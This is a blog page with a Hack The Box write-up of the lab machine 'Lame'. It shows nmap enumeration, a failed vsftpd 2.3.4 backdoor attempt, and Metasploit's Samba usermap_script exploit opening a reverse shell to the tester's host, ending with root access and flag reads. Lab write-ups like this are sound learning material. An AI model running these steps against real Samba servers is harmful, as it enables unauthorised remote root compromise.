<!DOCTYPE html>
<html lang="en">

<head>
    
<meta charset="utf-8" />
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" />
<meta name="HandheldFriendly" content="True" />
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
<meta name="generator" content="Hugo 0.79.0" />


<link rel="shortcut icon" href="/favicon/favicon.ico" />


<title>HTB: lame - ins3cure.com</title>


<meta name="author" content="ins3cure.com" />



<meta name="keywords" content="writeups" />

<meta property="og:title" content="HTB: lame" />
<meta property="og:description" content="hackthebox lame writeup" />
<meta property="og:type" content="article" />
<meta property="og:url" content="https://ins3cure.com/htb/lame/" />
<meta property="article:published_time" content="2020-06-22T00:00:00+00:00" />
<meta property="article:modified_time" content="2020-06-22T00:00:00+00:00" />

<meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="HTB: lame"/>
<meta name="twitter:description" content="hackthebox lame writeup"/>



<style>
    @media (prefers-color-scheme: dark) {
        body[data-theme='auto'] img {
            filter: brightness(60%);
        }
    }

    body[data-theme='dark'] img {
        filter: brightness(60%);
    }
</style>



<link rel="stylesheet" href="https://ins3cure.com/assets/css/fuji.min.css" />





</head>

<body data-theme="auto">
    <script data-cfasync="false">
  
  var fujiThemeData = localStorage.getItem('fuji_data-theme');
  
  if (!fujiThemeData) {
    localStorage.setItem('fuji_data-theme', 'auto');
  } else {
    
    if (fujiThemeData !== 'auto') {
      document.body.setAttribute('data-theme', fujiThemeData === 'dark' ? 'dark' : 'light');
    }
  }
</script>

    <header>
    <div class="container-lg clearfix">
        <div class="col-12 header">
            <a class="title-main" href="https://ins3cure.com">ins3cure.com</a>
            
            <span class="title-sub">You&#39;d better check your S3 buckets before someone else does</span>
            
        </div>
    </div>
</header>

    <main>
        <div class="container-lg clearfix">
            
            <div class="col-12 col-md-9 float-left content">
                
<article>
    
    <h2 class="post-item post-title">
        <a href="https://ins3cure.com/htb/lame/">HTB: lame</a>
    </h2>
    <div class="post-item post-meta">
        <span><i class="iconfont icon-today-sharp"></i>&nbsp;2020-06-22</span><span><i class="iconfont icon-pricetags-sharp"></i>&nbsp;<a href="/tags/writeups">writeups</a>&nbsp;</span>

    </div>
    
    
    <div class="post-content markdown-body">
        <p>I&rsquo;ve spent quite some time in the <a href="https://hackthebox.eu" target="_blank">hackthebox</a> platform so why not make my notes public?</p>
<p>This is my first writeup. As usual, the box is lame. It comes &ldquo;as is&rdquo; from my notes, but I&rsquo;ll try to make it more meaningful and explanatory in the future.</p>
<h2 id="enumeration">Enumeration</h2>
<p>First things first. Let&rsquo;s start with the usual scan:</p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-shell" data-lang="shell">map -A -T4 -v 10.10.10.3
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed <span style="color:#f92672">(</span>FTP code 230<span style="color:#f92672">)</span>
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to 10.10.14.15
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is <span style="color:#ae81ff">300</span>
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 <span style="color:#f92672">(</span>protocol 2.0<span style="color:#f92672">)</span>
| ssh-hostkey:
|   <span style="color:#ae81ff">1024</span> 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd <span style="color:#f92672">(</span>DSA<span style="color:#f92672">)</span>
|_  <span style="color:#ae81ff">2048</span> 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 <span style="color:#f92672">(</span>RSA<span style="color:#f92672">)</span>
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X <span style="color:#f92672">(</span>workgroup: WORKGROUP<span style="color:#f92672">)</span>
445/tcp open  netbios-ssn Samba smbd 3.0.20-Debian <span style="color:#f92672">(</span>workgroup: WORKGROUP<span style="color:#f92672">)</span></code></pre></div>
<p>It&rsquo;s funny, I use to run <code>nmap</code>in a different way now:</p>
<pre><code>nmap -sC -sV -oA output/file &lt;target&gt;
</code></pre>
<p>So we have:</p>
<ul>
<li>ssh — we can skip it, ssh is not usually vulnerable</li>
<li>samba 3.0.20</li>
<li>ftp
<ul>
<li>vsftpd 2.3.4</li>
</ul>
</li>
</ul>
<p>Let&rsquo;s search for exploits in metasploit:</p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-shell" data-lang="shell">searchsploit vsftpd 2.3.4
---------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                |  Path
---------------------------------------------------------------------------------------------- ---------------------------------
vsftpd 2.3.4 - Backdoor Command Execution <span style="color:#f92672">(</span>Metasploit<span style="color:#f92672">)</span>                                        | unix/remote/17491.rb
---------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results</code></pre></div>
<p>Interesting. There is a known vulnerability for the <code>vsftp</code> version running in the box. I would say these boxes where you have a CVE are easy. And yhis particular linux box is one of the easiest.</p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-shell" data-lang="shell">msfdb start
msfconsole
search vsftpd 2.3.4
Matching Modules
<span style="color:#f92672">================</span>
 
 <span style="color:#75715e"># Name Disclosure Date Rank Check Description</span>
 - ---- --------------- ---- ----- -----------
 <span style="color:#ae81ff">0</span> auxiliary/gather/teamtalk_creds normal No TeamTalk Gather Credentials
 <span style="color:#ae81ff">1</span> exploit/multi/http/oscommerce_installer_unauth_code_exec 2018-04-30 excellent Yes osCommerce Installer Unauthenticated Code Execution
 <span style="color:#ae81ff">2</span> exploit/multi/http/struts2_namespace_ognl 2018-08-22 excellent Yes Apache Struts <span style="color:#ae81ff">2</span> Namespace Redirect OGNL Injection
 <span style="color:#ae81ff">3</span> exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent No VSFTPD v2.3.4 Backdoor Command Execution
 
msf5 &gt; use exploit/unix/ftp/vsftpd_234_backdoor
msf5 exploit<span style="color:#f92672">(</span>unix/ftp/vsftpd_234_backdoor<span style="color:#f92672">)</span> &gt; show
show actions    show auxiliary  show exploits   show nops       show plugins   
show advanced   show encoders   show info       show options    show post      
show all        show evasion    show missing    show payloads   show targets   
msf5 exploit<span style="color:#f92672">(</span>unix/ftp/vsftpd_234_backdoor<span style="color:#f92672">)</span> &gt; show options
 
Module options <span style="color:#f92672">(</span>exploit/unix/ftp/vsftpd_234_backdoor<span style="color:#f92672">)</span>:
 
   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target host<span style="color:#f92672">(</span>s<span style="color:#f92672">)</span>, range CIDR identifier, or hosts file with syntax <span style="color:#e6db74">&#39;file:&lt;path&gt;&#39;</span>
   RPORT   <span style="color:#ae81ff">21</span>               yes       The target port <span style="color:#f92672">(</span>TCP<span style="color:#f92672">)</span>
 
 
Exploit target:
 
   Id  Name
   --  ----
   <span style="color:#ae81ff">0</span>   Automatic
 
 
msf5 exploit<span style="color:#f92672">(</span>unix/ftp/vsftpd_234_backdoor<span style="color:#f92672">)</span> &gt; set rhosts 10.10.10.3
rhosts <span style="color:#f92672">=</span>&gt; 10.10.10.3
msf5 exploit<span style="color:#f92672">(</span>unix/ftp/vsftpd_234_backdoor<span style="color:#f92672">)</span> &gt; run
 
<span style="color:#f92672">[</span>-<span style="color:#f92672">]</span> 10.10.10.3:21 - Exploit failed: An exploitation error occurred.
<span style="color:#f92672">[</span>*<span style="color:#f92672">]</span> Exploit completed, but no session was created.
msf5 exploit<span style="color:#f92672">(</span>unix/ftp/vsftpd_234_backdoor<span style="color:#f92672">)</span> &gt; exploit
 
<span style="color:#f92672">[</span>-<span style="color:#f92672">]</span> 10.10.10.3:21 - Exploit failed: An exploitation error occurred.
<span style="color:#f92672">[</span>*<span style="color:#f92672">]</span> Exploit completed, but no session was created.
msf5 exploit<span style="color:#f92672">(</span>unix/ftp/vsftpd_234_backdoor<span style="color:#f92672">)</span> &gt; back
msf5 &gt; exit</code></pre></div>
<p>Mmm, it seems it does not work.</p>
<p>We also have samba 3.0.20, let`s trye:</p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-shell" data-lang="shell">searchsploit samba 3.0.20
------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                          |  Path
------------------------------------------------------------------------ ---------------------------------
Samba 3.0.10 &lt; 3.3.5 - Format String / Security Bypass                  | multiple/remote/10095.txt
Samba 3.0.20 &lt; 3.0.25rc3 - <span style="color:#e6db74">&#39;Username&#39;</span> map script<span style="color:#960050;background-color:#1e0010">&#39;</span> Command Execution <span style="color:#f92672">(</span>Me | unix/remote/16320.rb
Samba &lt; 3.0.20 - Remote Heap Overflow                                   | linux/remote/7701.txt
Samba &lt; 3.0.20 - Remote Heap Overflow                                   | linux/remote/7701.txt
Samba &lt; 3.6.2 <span style="color:#f92672">(</span>x86<span style="color:#f92672">)</span> - Denial of Service <span style="color:#f92672">(</span>PoC<span style="color:#f92672">)</span>                           | linux_x86/dos/36741.py
------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results</code></pre></div>
<p>Again, we have suitable CVEs. Let&rsquo;s go for it!</p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-shell" data-lang="shell">msf5 &gt; search usermap
 
Matching Modules
<span style="color:#f92672">================</span>
 
   <span style="color:#75715e">#  Name                                Disclosure Date  Rank       Check  Description</span>
   -  ----                                ---------------  ----       -----  -----------
   <span style="color:#ae81ff">0</span>  exploit/multi/samba/usermap_script  2007-05-14       excellent  No     Samba <span style="color:#e6db74">&#34;username map script&#34;</span> Command Execution
 
 
msf5 &gt; use exploit/multi/samba/usermap_script
msf5 exploit<span style="color:#f92672">(</span>multi/samba/usermap_script<span style="color:#f92672">)</span> &gt; set rhosts 10.10.10.3
rhosts <span style="color:#f92672">=</span>&gt; 10.10.10.3
msf5 exploit<span style="color:#f92672">(</span>multi/samba/usermap_script<span style="color:#f92672">)</span> &gt; exploit
 
<span style="color:#f92672">[</span>*<span style="color:#f92672">]</span> Started reverse TCP double handler on 10.10.14.15:4444
<span style="color:#f92672">[</span>*<span style="color:#f92672">]</span> Accepted the first client connection...
<span style="color:#f92672">[</span>*<span style="color:#f92672">]</span> Accepted the second client connection...
<span style="color:#f92672">[</span>*<span style="color:#f92672">]</span> Command: echo hQ7DHGJcIvMlpKXV;
<span style="color:#f92672">[</span>*<span style="color:#f92672">]</span> Writing to socket A
<span style="color:#f92672">[</span>*<span style="color:#f92672">]</span> Writing to socket B
<span style="color:#f92672">[</span>*<span style="color:#f92672">]</span> Reading from sockets...
<span style="color:#f92672">[</span>*<span style="color:#f92672">]</span> Reading from socket B
<span style="color:#f92672">[</span>*<span style="color:#f92672">]</span> B: <span style="color:#e6db74">&#34;hQ7DHGJcIvMlpKXV\r\n&#34;</span>
<span style="color:#f92672">[</span>*<span style="color:#f92672">]</span> Matching...
<span style="color:#f92672">[</span>*<span style="color:#f92672">]</span> A is input...
<span style="color:#f92672">[</span>*<span style="color:#f92672">]</span> Command shell session <span style="color:#ae81ff">1</span> opened <span style="color:#f92672">(</span>10.10.14.15:4444 -&gt; 10.10.10.3:56484<span style="color:#f92672">)</span> at 2020-06-22 12:39:54 -0400
 
who
root pts/0 Jun <span style="color:#ae81ff">19</span> 05:31 <span style="color:#f92672">(</span>:0.0<span style="color:#f92672">)</span>
We<span style="color:#e6db74">&#39;re done, this one is trivial. Let&#39;</span>s try to get the flag hashes.
cd /root
ls
Desktop
reset_logs.sh
root.txt
vnc.log
cat root.txt   
92...df
     
ls /home
ftp
makis
service
user
    
ls /home/makis
user.txt
 
cat /home/makis/user.txt
69...c5</code></pre></div>
<p>Funny enough, we got the <em>root</em> flag before the <em>user</em> flag. This may happen in some more machines.</p>

    </div>
</article>




            </div>
            <aside class="col-12 col-md-3 float-left sidebar">
    
    <div class="sidebar-item sidebar-pages">
        <h3>Pages</h3>
        <ul>
            
            <li>
                <a href="/about/">About</a>
            </li>
            
            <li>
                <a href="/contact/">Contact</a>
            </li>
            
            <li>
                <a href="/index.xml">RSS</a>
            </li>
            
        </ul>
    </div>
    
    <div class="sidebar-item sidebar-links">
        <h3>Links</h3>
        <ul>
            
            <li>
                <a href="https://github.com/ins3curity" target="_blank"><span>GitHub</span></a>
            </li>
            
            <li>
                <a href="https://twitter.com/ins3cure_com" target="_blank"><span>Twitter</span></a>
            </li>
            
        </ul>
    </div>
    
    <div class="sidebar-item sidebar-tags">
        <h3>Tags</h3>
        <div>
            
            <span>
                <a href="/tags/code/">code</a> ·
            </span>
            
            <span>
                <a href="/tags/general/">general</a> ·
            </span>
            
            <span>
                <a href="/tags/linux/">linux</a> ·
            </span>
            
            <span>
                <a href="/tags/macos/">macos</a> ·
            </span>
            
            <span>
                <a href="/tags/open-source/">open source</a> ·
            </span>
            
            <span>
                <a href="/tags/security/">security</a> ·
            </span>
            
            <span>
                <a href="/tags/writeups/">writeups</a> ·
            </span>
            
        </div>
    </div>
    
    
    
    
</aside>
        </div>
        <div class="btn">
    <div class="btn-menu" id="btn-menu">
        <i class="iconfont icon-grid-sharp"></i>
    </div>
    <div class="btn-toggle-mode">
        <i class="iconfont icon-contrast-sharp"></i>
    </div>
    <div class="btn-scroll-top">
        <i class="iconfont icon-chevron-up-circle-sharp"></i>
    </div>
</div>
<aside class="sidebar-mobile" style="display: none;">
  <div class="sidebar-wrapper">
    
    <div class="sidebar-item sidebar-pages">
        <h3>Pages</h3>
        <ul>
            
            <li>
                <a href="/about/">About</a>
            </li>
            
            <li>
                <a href="/contact/">Contact</a>
            </li>
            
            <li>
                <a href="/index.xml">RSS</a>
            </li>
            
        </ul>
    </div>
    
    <div class="sidebar-item sidebar-links">
        <h3>Links</h3>
        <ul>
            
            <li>
                <a href="https://github.com/ins3curity" target="_blank"><span>GitHub</span></a>
            </li>
            
            <li>
                <a href="https://twitter.com/ins3cure_com" target="_blank"><span>Twitter</span></a>
            </li>
            
        </ul>
    </div>
    
    <div class="sidebar-item sidebar-tags">
        <h3>Tags</h3>
        <div>
            
            <span>
                <a href="/tags/code/">code</a>
            </span>
            
            <span>
                <a href="/tags/general/">general</a>
            </span>
            
            <span>
                <a href="/tags/linux/">linux</a>
            </span>
            
            <span>
                <a href="/tags/macos/">macos</a>
            </span>
            
            <span>
                <a href="/tags/open-source/">open source</a>
            </span>
            
            <span>
                <a href="/tags/security/">security</a>
            </span>
            
            <span>
                <a href="/tags/writeups/">writeups</a>
            </span>
            
        </div>
    </div>
    
    
    
    
  </div>
</aside>
    </main>

    <footer>
    <div class="container-lg clearfix">
        <div class="col-12 footer">
            
            <p>
                Unless otherwise noted, the content of this site is licensed under <a rel="license" href="http://creativecommons.org/licenses/by-nc-sa/4.0/" target="_blank">CC BY-NC-SA 4.0</a>.
            </p>
            
            <span>&copy; 2019-2020
                <a href="https://ins3cure.com">ins3cure.com</a>
                 | <a href="https://github.com/ins3curity/ins3cure.com">Source code</a> 
                | <a href="/legal/">Legal</a> | <a href="/privacy/">Privacy policy</a> 
                <p> Powered by <a href="https://github.com/amzrk2/hugo-theme-fuji/"
                   target="_blank">Fuji-v2</a> &amp; <a href="https://gohugo.io/"
                                                    target="_blank">Hugo</a> 
            </span>
        </div>
    </div>
</footer>

    
<script defer src="https://cdn.jsdelivr.net/combine/npm/medium-zoom@1.0.6,npm/lazysizes@5.2.2"></script>
<script defer src="https://cdn.jsdelivr.net/npm/prismjs@1.21.0/components/prism-core.min.js"></script>
<script defer src="https://cdn.jsdelivr.net/npm/prismjs@1.21.0/plugins/autoloader/prism-autoloader.min.js"></script>



<script defer src="/assets/js/fuji.min.js"></script>


</body>

</html>